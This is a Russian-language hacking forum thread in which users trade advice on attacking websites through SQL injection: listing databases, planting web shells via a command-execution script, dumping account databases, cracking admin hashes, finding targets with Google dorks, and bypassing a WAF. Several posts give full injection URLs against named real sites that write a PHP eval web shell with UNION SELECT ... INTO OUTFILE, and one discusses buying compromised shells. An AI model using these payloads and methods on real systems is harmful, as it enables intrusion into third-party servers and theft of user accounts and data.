database() - результат DB. Результат одинков .... " Table 'DB.members' doesn't exist " .. и когда просто members и DB.members .....
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....
с каких пор в таблице schemata содержатся названия таблиц? Code: select table_schema form information_schema.tables where table_name='name'
Есть скрипт например: site.ru/trololo/a.php Могу выполнять команды через него. Например: site.ru/trololo/a.php?cmd=ls -la Выводит лист этой диры. Так вот. Как залить шелл в диру корневую? Прав на заливку файла в папку /trololo/ нету.
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?
можно сдампить базу на стопицот мульонов акков и юзать её. а насчёт хеша, так в большинстве случаев он удачно брутиться или его вообще нет, т.к. пассы в plaintext.
1.XSS в SQL-инъекции - В парить админу, получить доступ в админку и залить шелл. 2. Знакомые Хэш-крякеры, платные сервисы взлома хэшей. 3. Если инъекция в UPDATE, INSERT... - Можно подменить данные в СуБДД 4. Поискать другие уязвимости - если их использовать вместе, можно получить наилучший результат. 5. Ну и конечно DoS ещё никто не отменял + с помощью инъекции можно узнать не только логины и хаш, а другие очень полезные данные.
Спасибо,за быстрые ответы, с вашего позволения еще один вопрос изложу: Один раз мне нужно было купить несколько трафистых shell-ов я обратился к одному человеку по рекомендации он мне говорит какой нужен траф и в какой зоне shell-ы нужны, я говорю траф 20к +- 5к зона de, он говорит могу за 5 дней достать shell-ов нулевок на каждом будет трафа 10-15 чел-сутки но вообщем будет траф 20к. Сделка так и не состоялась по моей вене! Меня собственно интересует такие вопросы: 1) как люди добывают такое количество shell-лов 2) это супер-пупер гениально умные,космические хакеры 3) может это развод
находится бага (или берётся в паблике) на каком-нибудь популярном (или не популярном) движке, с помощью которой можно залить шелл. далее по доркам парсится выдача гугла на наличие сайтов на данном движке.
Закоментиовал, настроил сплоит, получил: HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1 Authorization Required This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required. Дыра закрыта?
Подскажите как правильно заливать шелл через sql-inj. Code: Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45 поля 6 и 9 _http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'<?php eval($_REQUEST[cmd]); ?>',7,8,9+from+information_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1-- не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно) и опять 25, я что-то не так мб делаю? Code: http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+ http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'<?php eval($_GET[‘e’]) ?>',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+
Помогите плиз обойти WAF http://www.shungitclub.ru/category_page.php?cat=21&sub=union+select+1,2,+from+mysql.user--
1. Для записи шелла можно использовать не выводимые на страницу поля. 2. File_priv у учётной записи всё равно нет.